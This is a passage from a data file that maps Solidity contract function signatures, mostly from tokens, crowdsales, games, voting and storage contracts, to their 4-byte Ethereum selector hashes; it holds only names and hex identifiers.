"getLowestGameWithoutQuorum()": "0xc588ba1b", "getNextGameId()": "0xede8af01", "findAvailableGame(address)": "0x8e452fc0", "joinGames(address,uint256)": "0x07805363", "playFromBalance()": "0x6f90be06", "EtherShuffle(address[])": "0x66f9785a", "Operable(address[])": "0xf8515eca", "IdeaCoin()": "0xb8ddef1a", "ERC20Basic(string,string,uint8,uint256)": "0xd928e32e", "transferIDCContractOwnership(address)": "0x6d1909fc", "ACT()": "0x53da4859", "ahmadToken(uint256)": "0x20d7d860", "isController(address,address)": "0xc911b56e", "getOwedDividends(address)": "0x8ea390c1", "_getUncreditedPoints(address)": "0x86508380", "_updateCreditedPoints(address)": "0x7baa73c6", "collectOwedDividends()": "0x4d2efe4e", "EtherX()": "0x7c2b07e3", "DragonLock()": "0x6a38c0fa", "enablesTransfers()": "0x6738426c", "setTransferAdmin(address,bool)": "0x86c8c491", "ETG()": "0x07ef8b33", "NuruToken(uint256,uint256,string,string,uint8)": "0x1d300421", "changeDeveloperSFTDestinationAddress(address)": "0x581847d6", "triggerRefund()": "0x263d4878", "triggerMinCap()": "0xc2812f74", "SFTToken()": "0x2f482935", "OWN_burnToken(address,uint256)": "0x75fcc6f1", "OWN_contractlocked(bool)": "0x07cb4419", "TokenRK50Z()": "0xb98f0992", "calculateTokens(uint256,uint256,uint256)": "0xd4702576", "getRestricted()": "0x69949c77", "getMultisig()": "0x3c81df21", "setThirdBonusPercent(uint256)": "0x32deac1b", "setSecondBonusPercent(uint256)": "0xc7b9c355", "setCurrentRound(uint256)": "0x3bc91e28", "setRestrictedPercent(uint256)": "0x9986d936", "setRestricted(address)": "0xc18384ec", "LLToken(uint256,uint256,address)": "0xed6a2bc9", "unfreezeByIndex(uint256)": "0xbd16f1f3", "releaseSupply(uint256,uint256)": "0xe3bb3445", "ReleaseableToken(uint256,uint256,address)": "0xd6223305", "unlockBalanceByIndex(uint256)": "0xbc186dc9", "transferLockedToken(address,uint256,uint256)": "0x0851762a", "_tokenMetadata(uint256,string)": "0xa4935f1f", "_canTransferBatch(uint256)": "0x2f4736da", "_approvedForTransfer(address,address,uint256)": "0xc87744d9", "_approveTransfer(uint256,address,address)": "0xd67c4497", "_isOwnerOf(address,address,uint256)": "0xd68561a3", "_generateRandomDna(uint256)": "0xdb8cee5e", "_addPresale(uint256,uint256)": "0x30c33da7", "setPresaleMarketAddress(address,address)": "0x279fdf96", "setTransferDisabled(uint256,bool)": "0x210ae4d5", "getBatchInfo(uint256)": "0x1a0058f5", "getArtworkInfo(uint256)": "0xf1f201e8", "_takeOwnership(address,uint256)": "0xf41a12c8", "setBeginTimeTS(uint256)": "0xab79fd26", "setPaydayFrequencyInDays(uint8)": "0xa90a6427", "setDailyHourLimit(uint8)": "0xc268e777", "setContractDurationInDays(uint16)": "0x53efb13f", "setContractName(string)": "0x0b5ee006", "CryptonewsIndonesia(uint256,uint256)": "0x66c0276e", "ZULICC()": "0xff3e51c8", "GameXToken()": "0xfd814dbd", "_withdrawal()": "0xb471fade", "_realBalanceOnToken(address)": "0x7ae7024c", "_realBalanceOnEther()": "0x0097130e", "getUserBalanceOnToken(address,address)": "0x0138aac1", "getUserBalanceOnEther(address)": "0xc5bfa9d9", "getUserNumbersOnEther(uint256)": "0x88da9bfd", "getRaisedAmountOnToken(address)": "0x6a2d5028", "getRaisedAmountOnEther()": "0xa0b9e8d5", "registerMeOnTokenCore(address,address,uint256,string)": "0x74da564f", "registerMeOnToken(address,uint256,string)": "0xd75d93f6", "registerMeOnEther(string)": "0xfa02955f", "NRB_Main()": "0xe37362ab", "NRB_Common()": "0xb139f780", "sendFLC(address,address,uint256)": "0xb2a8a6f3", "registerTokenPayment(address,uint256)": "0x5d383eaa", "registerToken(address,string,string,uint256)": "0x04ffb5b9", "getTokenAddressByIndex(uint256)": "0x5715c5b7", "getTokenListLength()": "0x5719dd22", "getUserTotalCredit(address,address)": "0x9c526380", "getUserTotalPaid(address,address)": "0xf900b5d6", "getUserNumbersOnToken(address,uint256)": "0x76dc76e7", "getUserLengthOnToken(address)": "0x161181ea", "getUserLengthOnEther()": "0x517a626f", "getUserIndexOnToken(address,address)": "0xfe5aa8e0", "getUserIndexOnEther(address)": "0x0ee3c31d", "refundBNBContributor()": "0x668c1a46", "processPayment(address,uint256,uint256,uint256,bool)": "0xa4366a8a", "processContribution(address,uint256)": "0xf4ace1a5", "processBNBContribution()": "0x511d2299", "processReservationContribution(address,uint256)": "0x7d052a2e", "setLockedTokens(address)": "0xacb9656c", "addToPrivilegedList(address)": "0x4f0b8374", "addAdditionalBonusMember(address)": "0x52f18042", "addToLists(address,bool,bool,bool,bool)": "0x5707812e", "isValidBNBContribution()": "0x68927cd2", "validateCap()": "0x01baa2e7", "isValidContribution()": "0xe1a6ddcd", "TheAbyssDAICO(address,address,address,address,address,address,address,address,address,address,address,address)": "0x7199139f", "disableLimit()": "0x1acc26bc", "delLimitedWalletAddress(address)": "0x7d802655", "addLimitedWalletAddress(address)": "0xee8cbc9d", "TransferLimitedToken(uint256,address,address[],address)": "0x5e62463a", "addTokens(address,uint256,uint256)": "0xca056aed", "withdrawEther(uint64)": "0xe1883433", "addMinerTokens(uint64,address[],uint64[])": "0xec8b8f4e", "wkaToken()": "0xd4c55f56", "ETH530on420()": "0xbe14e5fc", "DiscrashCredit()": "0xfa16c53b", "InitialCoinOfferingToken()": "0xb81ca723", "setFundAddress(address)": "0x85dc3004", "ParagonCoinToken(address)": "0xbdd41d4c", "processFee(uint256)": "0xbe4474b4", "purchaseStake()": "0x18c0e04f", "CapiterContract()": "0xe28b7555", "SISKCoin()": "0x475d41f9", "giveReward(address,address,uint256)": "0x460a6507", "Cowboy()": "0x7bb5e1d1", "get_back()": "0xffa05698", "CoinStocker()": "0x5218f3b3", "CETToken(uint256,string,string)": "0xa8f06876", "DCE_Coin()": "0x3368db4f", "setInfo(string,string)": "0xa923fc40", "promo(address[])": "0x3971ee42", "SafeGiftTokens(uint256,string,string)": "0x134b684f", "Presalezillion()": "0x5371e490", "GetMyEarning()": "0xd8104e19", "GetMyAcorn()": "0xcdf3bdab", "GetMyEgg()": "0x77bad015", "GetMyProd()": "0xedfa45e6", "GetMySnail()": "0x1e3e6369", "ComputeEggsSinceLastHatch(address)": "0x78d7ccea", "ComputeMyEggs()": "0x05f0f662", "ComputeBuy(uint256)": "0xc22af7ff", "ComputeSell(uint256)": "0x407ed2e2", "ComputeAcornPrice()": "0x0f8dc272", "BecomeTadpolePrince()": "0x90f0a5bd", "BecomeSquirrelDuke()": "0xce1ed2bb", "BecomeSpiderQueen()": "0x6a8b9f7b", "BuyStartingSnails()": "0x1c3122ba", "BuyEggs()": "0xcfaf7315", "SellEggs()": "0x4ab273f0", "HatchEggs()": "0xb9cb5b5f", "AcornPotSplit(uint256)": "0x1290aed9", "PotSplit(uint256)": "0xd669133f", "WithdrawEarnings()": "0xad2e6aff", "BecomeSnailmaster()": "0xde656b71", "BuyAcorns()": "0x75b9fd47", "SellAcorns(uint256)": "0x0d13bec6", "SeedMarket(uint256,uint256)": "0x9e1be663", "stopBonusCompaign()": "0xcbacb269", "startBonusCompaign(uint256)": "0x0ed3909c", "BLTCoin(address)": "0x8bbd309c", "SQR_TOKEN()": "0xd4b2d5f0", "bonusLimit3()": "0x7f2b06ed", "PRICE_ICO1()": "0x41923c0c", "finalizeConfig()": "0x27bcc9ca", "isMainChain()": "0xb834f6fb", "dateEcoRelease6()": "0xe810267a", "testUnlockedDay()": "0x249292b9", "presaleStorageVault()": "0x95a01505", "discountBlock()": "0xe298d85c", "totalTokensAllocated()": "0xc07f773a", "stillAllowedReadable()": "0xec3d5ffb", "nextInvestorsProfitSum()": "0x8d5f3f96", "REFUND_DIVISION_RATE()": "0xfcb750cf", "supplier()": "0x36da4468", "getDeclaration()": "0x4f610e74", "endFourthWeek()": "0x5f9a2c23", "takerFeePercent()": "0x2f3e5408", "year4LockAddress()": "0x2df5a559", "totalSoldTokensWithBonus()": "0x70887eb9", "NoxonInit()": "0xea1f9b3e", "unspent_supply()": "0x1796b2ca", "bountyAffiliateWallet()": "0x5b92cdee", "acceptOwner()": "0xebbc4965", "jester()": "0xe2202a4d", "preallocatedTokenAmount()": "0x1984a906", "fundIco()": "0xf6f3973f", "getNumOfLotteryTickets()": "0x411a492e", "preicoSupply()": "0x6f1ca0c2", "buy100Price()": "0x851e6b3a", "sanctuary()": "0x6f34a7ff", "challengeNumber()": "0x8ae0368b", "mintingContractAddress()": "0x824563f6", "coinIssuedFoundation()": "0x6ba55c6d", "exrate()": "0xa3dc8a7a", "totalFinalStage()": "0x07489aa6", "_commissionTarget()": "0xdb8298f3", "FULL_TOKEN_AMOUNT()": "0xfb1e3804", "maxCapCompanyInventory()": "0x34cec84d", "takerFeeRateE4()": "0xe056f2ff", "centralMinter()": "0xd9f01878", "perTokenAmountMax()": "0xc0e33275", "directMintLimit()": "0x70c0c516", "TOTAL_SUPPLY_ACES()": "0x97487af8", "getBrickSize()": "0xbdb4dc6e", "fourthRelease()": "0xb73f1e52", "extendedTimeLock()": "0xc8ccaebc", "UNFREEZE_TEAM_BOUNTY()": "0x87864af8", "COMMON_WITHDRAW_SUPPLY()": "0xb8fbb72d", "changeIdentityNarcoRespect()": "0x7e7e5a75", "getRemainingCompanyTokensAllocation()": "0x0d032623", "fundsFromPreSale()": "0x7a041e7e", "startICOTimestamp()": "0x8f3f50fc", "priceT2()": "0x45f988a4", "usdt()": "0x2f48ab7d", "presaleopeningTime()": "0x83baa6f4", "RANGESTART_6()": "0x402caccd", "miningWarContractAddress()": "0x59a02652", "carrotsMultiplier()": "0x931c0040", "getTreesOnSale()": "0x7f64727b", "totalBuyCardNumber()": "0x52b4be89", "initialSaleDuration()": "0xca0f1215", "softCapInToken()": "0xbcbb64c4", "LNCH()": "0x58dfb058", "feeNewThread()": "0x58c0bde0", "RubidSupply()": "0x6196ac5b", "fixUSDPriceTime()": "0x56639a8e", "hourlyProduction()": "0x297398b5", "startPublicSaleStage()": "0xf1b541c2", "hydroContract()": "0xae7a833d", "PHASE_1_PRICE()": "0xd074f215", "hexToken()": "0x49ce0a11", "imageHash()": "0x51605d80", "blacklistSwitch()": "0xf7decfd1", "VUP_PER_ETH_PRE_SALE_RATE()": "0x9d000e78", "CountExecs()": "0xca1a4942", "bonusPot()": "0x81cd5eec", "setEndEdit()": "0x08a9dd29", "totalWEIInvested()": "0xc3a1e7cc", "buy_end_time()": "0xd1dd2794", "startTimeSaleWithBonus()": "0xfb77eae2", "countInvestor()": "0xd1e2eb5e", "priceChange()": "0x71d9ffce", "developerAllocation()": "0x62feff3a", "m_wcStored()": "0xd5ad2e00", "has()": "0xb689d5ac", "MUSPRA()": "0x1ffbf32b", "fundFounder()": "0xad121e33", "hundredPercent()": "0x8a9cb361", "jackpotWinCount()": "0x64d0e83b", "getPoolETHBalance()": "0x0abb8409", "SEC_PER_ETHER()": "0x128cf7c5", "minerAddress()": "0x59275c84", "investorsGrantsAmount()": "0x47b60ec0", "gasLimit()": "0xf68016b7", "endTimestamp()": "0xa85adeab", "lastBetUser()": "0x0853b015", "candy()": "0xf616ce3c", "walletName()": "0xcf8d8ca0", "weiSold()": "0x415ef37c", "refundstate()": "0xdcabf93f", "becomeSponsor()": "0xe3e9bc3f", "getRankList()": "0xa1a200c5", "initData()": "0x8eb36e3d", "Minewar()": "0x47fa5648", "Tube()": "0x6fd507f2", "acceptOwnerTransfer()": "0x707a7ab3", "proposeNewOwner(address)": "0xb1f8100d", "ownerSetStakeStartTime(uint256)": "0x2a9edf6f", "ICOBIDToken()": "0x9fab63c7", "Gaoguans(address)": "0x2919fccd", "End()": "0x06e64907", "_goodAddress(address)": "0x332a2219", "_rand(uint256)": "0xe1eddc6d", "_own(uint8)": "0x97e6dada", "_Doihave(uint8)": "0x0acdc3ef", "Chou(uint8)": "0xdd6afdfe", "MyGaoguans()": "0xf86a3eeb", "auto_withdraw(address)": "0xd2c03c01", "withdraw(address,bool)": "0x5437e401", "activate_kill_switch(string)": "0xd4701c35", "unfreeze(address,uint256)": "0x7b46b80b", "freeze(address,uint256)": "0x24bce60c", "TTC()": "0x799957d2", "stockSellCertainOrder(uint256,uint256,uint256,uint256)": "0x2d8d96fa", "stockBuyCertainOrder(uint256,uint256,uint256,uint256)": "0x9d4327a0", "dividends(uint256)": "0x814b3fe0", "getLastDividends(uint256)": "0x533574ca", "stockCancelSellOrder(uint256,uint256,uint256)": "0x2dba1a44", "stockCancelBuyOrder(uint256,uint256,uint256)": "0xca1861aa", "stockSellOrder(uint256,uint256,uint256)": "0x90b625f9", "stockBuyOrder(uint256,uint256,uint256)": "0x51a0aff0", "getStockSellOrderPrices(uint256)": "0x0f2636bd", "getStockBuyOrderPrices(uint256)": "0x454c57ee", "getStockOrderInfo(bool,uint256,uint256,uint256)": "0xa441698b", "getWithFrozenStockBalance(address,address,uint256)": "0x4c7940c5", "getStockBalance(address,address,uint256)": "0xff5de44b", "getStockOwnerInfo(address,address)": "0x51ce3207", "getEmission(uint256)": "0x03e7b4e9", "stockTransfer(address,uint256,uint256)": "0x6a9e8f27", "sellCertainOrder(uint256,uint256,uint256)": "0x8700ceb2", "buyCertainOrder(uint256,uint256)": "0xb4cdd3b7", "cancelSellOrder(uint256,uint256)": "0xe51dfd90", "cancelBuyOrder(uint256,uint256)": "0x8c748334", "sellOrder(uint256,uint256)": "0xcd61a95a", "getOrderInfo(bool,uint256,uint256)": "0x76207a5b", "getSellOrderPrices()": "0xb36ba252", "getBuyOrderPrices()": "0x6867edeb", "setNodesVars(address)": "0x4ae5d478", "getWithdrawal()": "0x806ad169", "Starmid(uint256,string,string,uint8)": "0xead4faaf", "getNodeInfo(uint256)": "0x53e215f4", "changePercent(uint256,uint8)": "0x4f438ddb", "outsourceConfirmNode(uint256)": "0xc8e8ce63", "confirmNode(uint256)": "0x597dfbaf", "deleteNodeGroup(uint256,uint16)": "0x5972e062", "pushNodeGroup(uint256,uint16)": "0x871e0155", "addNodeAddress(uint256,address)": "0xd946af8f", "editNode(uint256,address,bool,address,uint8,bool)": "0x1dc18c45", "addNode(string,uint8)": "0x8b53cbaa", "addNodeGroup(string)": "0xdcb032ce", "addConfirmationNode(string)": "0x121839f6", "addOwnerNotations(string)": "0xf2451a43", "Nodes()": "0x486ea48d", "XCNTToken()": "0x25112004", "JuggernautToken()": "0x50b58c06", "RozowkaCoin(uint256,string,string)": "0x62d72c08", "CCH_Seaport_1()": "0xd9daae78", "MooguToken()": "0xae665d5d", "_transferFrom(address,address,address,uint256)": "0x851d1c27", "unlock(uint256)": "0x6198e339", "TokenTimeLock(address)": "0x9443b9be", "Alpon()": "0x940d5e08", "GECToken(address,uint256)": "0xfadf4f3b", "isSignedByAll()": "0xcf4228ea", "isSignedByEugene()": "0x90ea0fb8", "isSignedByToly()": "0xd135ae6e", "isSignedByAndrey()": "0x8cff1990", "isSignedByAlex()": "0x0da97716", "isSignedBy(address)": "0x7f91fb7d", "singBy(address)": "0x1753a655", "sing()": "0xb4ba349f", "DUMPSACK()": "0x6d86ac59", "isApprovedInvestor(address)": "0x9b1fe0d4", "ContractToken(address,string,string,uint256)": "0x665502ec", "formatDecimals(uint256)": "0x26625e46", "addContract(address,address,address,string)": "0x4e96ea53", "removeFabric(address,address)": "0x5a91e5e9", "addFabric(address,address)": "0x9393c09c", "MainFabric()": "0x11daf56a", "numFabrics()": "0x56b760f2", "getAdminContract(address,uint256)": "0x91c873cb", "numAdmins()": "0x0efd4989", "numContracts()": "0x524d81d3", "removeController(address)": "0xf6a74ed7", "addController(address)": "0xa7fc7a07", "BdpPriceStorage(bytes8)": "0x1e3c73bd", "setForwardUpdateFeesTo(address)": "0x214e5f3a", "getForwardUpdateFeesTo()": "0xb74d4103", "setForwardPurchaseFeesTo(address)": "0x52251884", "getForwardPurchaseFeesTo()": "0x4a122266", "_underMintNextTokenId(uint256)": "0xa8fdf903", "_nextTokenId(uint256)": "0x77146255", "underMint(address,uint256)": "0x7d55758f", "purchaseTo(address,uint256)": "0x891407c0", "_updateArtistLookupData(address,uint256)": "0xb51ac349", "_updateEditionTypeLookupData(uint256,uint256)": "0x336c9b97", "_createEdition(uint256,bytes32,uint256,uint256,uint256,address,uint256,uint256,string,uint256,bool)": "0xb8871f98", "createInactivePreMintedEdition(uint256,bytes32,uint256,uint256,uint256,address,uint256,uint256,string,uint256,uint256)": "0x9cd77457", "createActivePreMintedEdition(uint256,bytes32,uint256,uint256,uint256,address,uint256,uint256,string,uint256,uint256)": "0xae8a8690", "createInactiveEdition(uint256,bytes32,uint256,uint256,uint256,address,uint256,uint256,string,uint256)": "0xe65d19ca", "createActiveEdition(uint256,bytes32,uint256,uint256,uint256,address,uint256,uint256,string,uint256)": "0x8bbb594a", "hasRole(address,uint8)": "0x95a8c58d", "checkRole(address,uint8)": "0x23a3ad72", "removeAddressFromAccessControl(address,uint8)": "0x975347b8", "addAddressToAccessControl(address,uint8)": "0x43923258", "parseAndRound(string,uint8)": "0x35353b03", "fazzycoin()": "0x93643a5b", "setFracoinAuction()": "0xae01ab47", "TransferCoinsFrom(address,address,uint256)": "0x81fdbeff", "add_number(uint256)": "0xe3e2b1ba", "canBuy(address,address)": "0xc19da6b2", "onReceivePrivate(address,address,uint256,bytes)": "0x9053ef56", "receiveFromSigned(address,bytes,uint256,uint8,bytes32,bytes32)": "0x2aab1351", "receiveFrom(address)": "0x82520e07", "getXPub(address)": "0x52d48a95", "checkOwner(address,address)": "0xfe1ce5d7", "cabbageToken()": "0xc94b5c3d", "TEBT()": "0x7c622a65", "addContract(address,string)": "0x4300e8ef", "WayCellToken()": "0xe7afae52", "reLoadKey(uint256,uint256)": "0x037ae882", "buyKey(uint256)": "0x9fef93f8", "transmit(address,address,uint256)": "0x6ad38e61", "Yachtco()": "0x4ac36201", "UpgradeabilityProxy()": "0x1721117b", "ViewSecretBet(address)": "0x52f775c8", "terra()": "0x618ea1c4", "adminClaimAirdropMultiple(address[],uint256[])": "0x3df2b723", "MAKJLEB()": "0xa44d0eb3", "countDown()": "0x5fcbd5b6", "B123Token()": "0x1dc8a3bb", "forward(address,address)": "0x95ccf8bf", "payFromAllowance(address,address,address,uint256)": "0x1d7099d3", "revokeAllowance(address,address)": "0x7ae26773", "reduceAllowance(address,address,uint256)": "0xc8d0ec0a", "YBHY()": "0x1bf651ff", "sellTokensNow(uint256)": "0x74a7d77c", "updateTokenSellAmount(uint256)": "0x92f48846", "updateMaxTokenLimit(uint256)": "0xc0f0c21c", "frozenAccountOf(address)": "0x9b2aab1d", "GalaxyChain()": "0x0bec3231", "FarziToken()": "0x4c3ec50b", "FindMyFish_EnterBarcode(bytes9)": "0x57945ed1", "BurnTokensNew(uint256)": "0x80be3cc4", "allowedToBurn()": "0x0f78628e", "prepareURL()": "0x9ccf1a68", "MerrierToken(string,string,uint256,uint256,bool)": "0x2ad8fbd2", "ERC777DemoToken(string,string,uint256,uint256,uint8)": "0xae005a87", "_getTxDataBlockNumber(address,bytes32)": "0x58958be3", "getTxDataBlockNumber(address,bytes32)": "0x174a6277", "deleteTxDataBlockNumber(bytes32)": "0xa2b6cbe1", "setTxDataBlockNumber(bytes32,bytes)": "0x5b2a372d", "_getBytes(address,bytes32)": "0x0416c10c", "_deleteBytes(bytes32)": "0x7d0f023d", "_setBytes(bytes32,bytes)": "0x99cd40aa", "getBytes(address,bytes32)": "0x6556f767", "_getString(address,bytes32)": "0x327a765a", "_deleteString(bytes32)": "0x09d45f1d", "_setString(bytes32,string)": "0x584084d9", "getString(address,bytes32)": "0xe318de73", "_getBool(address,bytes32)": "0x6a0324b0", "_deleteBool(bytes32)": "0x8bd0f12b", "_setBool(bytes32,bool)": "0xa5b6420e", "getBool(address,bytes32)": "0x9d74b37d", "_getInt(address,bytes32)": "0x9913380e", "_deleteInt(bytes32)": "0x26428430", "_setInt(bytes32,int256)": "0x0f8fcb74", "getInt(address,bytes32)": "0x95ee8bae", "_getUint(address,bytes32)": "0x7b03e5f0", "_deleteUint(bytes32)": "0x3527cae0", "_setUint(bytes32,uint256)": "0x8a8090b8", "getUint(address,bytes32)": "0x71658552", "_getAddress(address,bytes32)": "0xf981f0c0", "_deleteAddress(bytes32)": "0xd687a9b3", "_setAddress(bytes32,address)": "0x973549ea", "getAddress(address,bytes32)": "0x7ac4ed64", "Ftechiz()": "0x0b25cbb2", "PlayChainPromo()": "0x87a91506", "astutelandToken()": "0x1876d0a9", "getTransactionConfirmerInfo(uint256,address,address)": "0x13ed5f31", "getTransactionApproveCount(uint256)": "0xdcb35d06", "isTransferApprove(uint256)": "0xc56bbda4", "RedRabbitToken()": "0x17897fcd", "sendBatch(address[])": "0xc3abe888", "OlivToken()": "0x9cc946ee", "setHard_Cap(uint256)": "0x9d30584c", "setSoft_Cap(uint256)": "0xe47ffb64", "AirToken()": "0x855ceb7d", "getTotalExchanged(address)": "0xd9b5134c", "addressToAsciiString(address,address)": "0x578de8aa", "CropOracle(address)": "0xb3f15866", "numTransactions()": "0x90b4cc72", "PrivateLedger()": "0x940f0661", "Exchange()": "0x0a77b078", "withdrawBalance(address,address,uint256)": "0x45d9a1ce", "isAbstainAllow()": "0x51d997b2", "voteStatus(bytes32,uint256)": "0xb4512913", "isVotable(bytes32)": "0xc0835106", "getNumberOfChoices(bytes32)": "0xa003651d", "cancelVote(bytes32)": "0x9525c0cc", "voteWithSpecifiedAmounts(bytes32,uint256,uint256,uint256)": "0xac5d8745", "ownerVote(bytes32,uint256,address)": "0x339e23d1", "cancelProposal(bytes32)": "0x37376ca8", "WillCoin(string,uint256,string,uint8)": "0xcdce240c", "getTokenDetail()": "0x289de615", "modifyCurrentHardCap(uint256)": "0x5ceaa0bf", "addBonusForMultipleHolders(address[],uint256[])": "0xc1766657", "addBonusForOneHolder(address,uint256)": "0x588bf28b", "approveBalancesWaitingKYC(address[])": "0x479fb784", "balanceOfKyCToBeApproved(address)": "0x8dd747ec", "changeTotalSupply(uint256)": "0x52e97326", "totalNumberTokenSold()": "0x2641d381", "changeStartTime(uint256)": "0x8aa5b2c3", "updateICODate(uint256,uint256)": "0x1ff75851", "startTradable(bool)": "0x9bfaa24b", "changeTokenRate(uint256)": "0x4fbe30d4", "changeMultiSignatureWallet(address)": "0x69aaa388", "refundFunds(address)": "0xd3b0d9eb", "updateBalances(address,uint256)": "0xef1e5663", "tokensale(address)": "0xb113d9dc", "CTCToken(address)": "0xb4972398", "test_1()": "0x663bc990", "Savings(uint256,uint256)": "0xf8d93136", "functionName1(bytes32)": "0xf44b54ca", "subscribe(address,uint256)": "0x8de69284", "deleteRef(bytes32)": "0x028fb6b8", "updateRef(bytes32,string)": "0xcb4bd883", "createRef(bytes32,string)": "0x39ccdd49", "MultiSigWalletMock(address[],uint256)": "0xbe5b9c74", "setBlockDotTimestamp(uint256)": "0x38353104", "setBlockDotNumber(uint256)": "0x9624e534", "setBlockDotGasLimit(uint256)": "0x5028594a", "setBlockDotDifficulty(uint256)": "0xda46eda1", "setBlockDotCoinbase(address)": "0xedf0d328", "setBlockDotBlockHash(uint256,bytes32)": "0x092f3623", "lockOwner(address)": "0xb56d4717", "create(string,address[],address,address)": "0x32f46374", "deduct(address,uint256)": "0x47055321", "earn(address,uint256)": "0xb02bf4b9", "ScoreToken(string,uint8,string,string)": "0xa52b904b", "ERC20Token(uint256,string,uint8,string)": "0xd28cbded", "getSecurityDepositRegistry()": "0xff31f9e6", "getAuditorRegistry()": "0x73a5f508", "getPublisherRegistry()": "0xcbad3779", "getDSPRegistry()": "0xb64f3cac", "getSSPRegistry()": "0x69c254b9", "DataStore(string)": "0xf487c403", "RegularContract()": "0x43d6fab6", "proposeUpgrade(address)": "0xc915fc93", "init(address,string,string)": "0xb2b45df5", "getLatestVersion()": "0x0e6d1de9", "setGasCost(uint128)": "0x669541d6", "setReward(uint128)": "0x75643e1f", "promethExecute()": "0x4686030f", "promethCost()": "0xb478886d", "dummyAgent()": "0xe57c8d1b", "endIco()": "0xe657807b", "transferUnsoldIcoTokens()": "0x5a8d6cea", "enableICO()": "0xcee401ef", "setContributionDates(uint256,uint256)": "0xfcfe2247", "delegateVestingContractOwner(address)": "0xf72c75a5", "setMultisignWallet(address)": "0x133d5d4e", "transferPreSaleTokens(uint256,address)": "0x43ba2cf5", "setSoldPreSaleTokens(uint256)": "0x5ba5b1b2", "disableTokenTransferability()": "0x7f493ce6", "enableTokenTransferability()": "0xe968ab95", "createTokenVestingContract(address)": "0xab635b48", "createVestingForFounder(address)": "0x50d0b060", "SLMICO(address)": "0xe0e29ac1", "decrement(uint256)": "0x3a9ebefd", "getElementAt(uint256)": "0xd8a865f6", "StringDemo()": "0x0be0453b", "getContribution(uint256)": "0xcef42254", "setFailed()": "0x146901db", "setSuccessful()": "0x8ad14ee6", "setIdle()": "0xa494817b", "setActive()": "0x760a8c2a", "PembiCoinICO()": "0x97792f2f", "offerBtcFromApp(address,uint256)": "0x90f551ec", "sendTokenFromDex(address,uint256)": "0x17bf8f50", "getVoting(bytes32)": "0x445cb2df", "getVote(bytes32,address)": "0xb3e7c2bd", "vote(bytes32,address,bool)": "0x730ad454", "votingActive(bytes32)": "0xb9c3515c", "createVoting(bytes32)": "0x84f19f37", "CommunityVotes(uint256)": "0xcaee4e18", "getS()": "0xe93314ab", "set2(uint256,uint256)": "0x4f829ee8", "distributeToken(address)": "0x86d74037", "activateMe(string)": "0x784f6654", "multimint(address[],uint256[])": "0x14004ef3", "HammBones()": "0xa7c9d92f", "endCrowdsale()": "0x2095f2d4", "toZT(uint256)": "0x612472fe", "confirmBeneficiary()": "0x9c5e9023", "ZTCrowdsale(address,address,address,uint256)": "0x601d54eb", "Batman(uint256,string,string)": "0xe82db7a0", "lookup(int256)": "0x5a4fc9c5", "PoissonData()": "0x7f2e98ad", "approveToPullOutTokens(address,address,uint256)": "0xbd837b2b", "distributeWithTransferFrom(address,address,address[],uint256[])": "0xb0885dd6", "distributeTokenToAddressesAndAmountsWithoutHost(address,address[],uint256[])": "0xb425bd43", "distributeTokenToAddressesAndAmounts(address,address,address[],uint256[])": "0x5f4402c5", "distributeTokenToAddress(address,address,address,uint256)": "0x2b44e5be", "PACOIN(uint256,string,string)": "0x389e40d2", "APPToken()": "0xb72a0026", "multiTransfer(uint256,address[])": "0x9886de1f", "TokenDrop()": "0xc5bfd5dd", "Mobilink()": "0xaa0e38b4", "backDevvoteOwner()": "0x064c4ebc", "DevvotePrefund(address,address)": "0xa9390454", "DevotteToken()": "0x2d0b1451", "LongBCoin(uint256,string,uint8,string)": "0xfff6a540", "Crypto010()": "0xafc0b5d3", "resolveSupply()": "0x34b3b014", "calcResolve(address,uint256,uint256)": "0x2fa30d33", "addPigment(address,uint256,uint256,uint256,uint256)": "0xe8dfa50d", "processReinvest(address,uint256,uint256,uint256)": "0xba5c9bd6", "TOKEN_scaleDown(uint256,uint256)": "0x17a23ec6", "buyCalcAndPayout(address,uint256,uint256,uint256,uint256)": "0x59f62cdc", "buy(address,uint256,uint256,uint256)": "0x1622dbe4", "trickleUp(address)": "0xfb5209bf", "fluxFeed(uint256,bool,bool)": "0x1423113a", "price(bool)": "0x6ab15436", "reinvest_color(address,uint256,uint256,uint256)": "0x556bcece", "fund_color(address,address,uint256,uint256,uint256)": "0xf7a7ec12", "fund(address,address)": "0xa4a85b22", "edgePigment(uint8)": "0x43559743", "rgbLimit(uint256)": "0x72ef6a08", "reffUp(address)": "0xba32348f", "sellBonds(uint256)": "0xee4350ed", "fullCycleSellBonds(uint256)": "0x2bc5ca7a", "holdingsOf(address)": "0x03995b2d", "moveUnsoldTokens()": "0xdce85216", "changeSalePeriod(uint256,uint256)": "0x52617234", "PeriodicTokenVesting(address,uint256,uint256,uint256,uint256,bool)": "0x5372c1db", "createVesting(address,uint256,uint256,uint256,uint256,bool)": "0x07433ca4", "initVesting()": "0x20375692", "setICOEndTime(uint256)": "0x13a2852d", "updatePreICOMaxTokenSupply(uint256)": "0x591f36a6", "calculateEthersAmount(uint256)": "0x09d451ab", "getMinEthersInvestment()": "0xb9af809e", "setPurchaseLimits(uint256,uint256)": "0xbe30f0a6", "SellableToken(address,address,uint256,uint256,uint256,uint256)": "0xee699681", "burnUnsoldTokens(uint256)": "0xd0479abc", "burnInvestorTokens(address,address,uint256)": "0x51cf6b22", "increaseLockedBalance(address,address,uint256)": "0x82917320", "isTransferAllowed(address,uint256)": "0x5eae177c", "setCrowdSale(address)": "0xf4b5cbc4", "GigToken(bool)": "0x6b8487be", "GigERC20(uint256,string,uint8,string,bool,bool)": "0x1aed8e1e", "multivestBuy(address,address,uint8,bytes32,bytes32)": "0xbdc2f1e8", "multivestBuy(address,address,uint256)": "0x90810c77", "Multivest()": "0x80bd0936", "releaseTeamTokens()": "0x14c411c7", "CrowdsaleToken()": "0xe4d9e130", "addStageAmount(uint256)": "0xdf8812c7", "tokensAmount(uint256)": "0x27962fc1", "setSale()": "0x1d9cfd6d", "setPreSale()": "0x7e2ff5f9", "setPrivateSale()": "0xd1f1ef34", "Staged()": "0x140f7f8d", "multisendEth(address[],uint256[])": "0x106524a5", "multisendToken(address,address[],uint256[])": "0x0b66f3f5", "vanishToken(uint256)": "0x9465c114", "ABC(uint256,string,uint8,string)": "0xd1e8acb4", "SLC()": "0x6248fd10", "Coinname()": "0xbe297530", "Extreme()": "0x2f08acfa", "AIMToken()": "0xb5c56797", "CBMDToken()": "0x7f453951", "setAdminVariables(uint256,uint256,uint256,uint256,uint256)": "0xf0c95bc1", "getAdminVariables()": "0xd8afc2fe", "withdrawBalanceAmount(uint256)": "0x79e0ef1b", "withdrawBonus(uint256)": "0x72d32968", "endCurrentGame()": "0xb033777f", "getPlayerInfo()": "0xd1df81df", "isGameActive()": 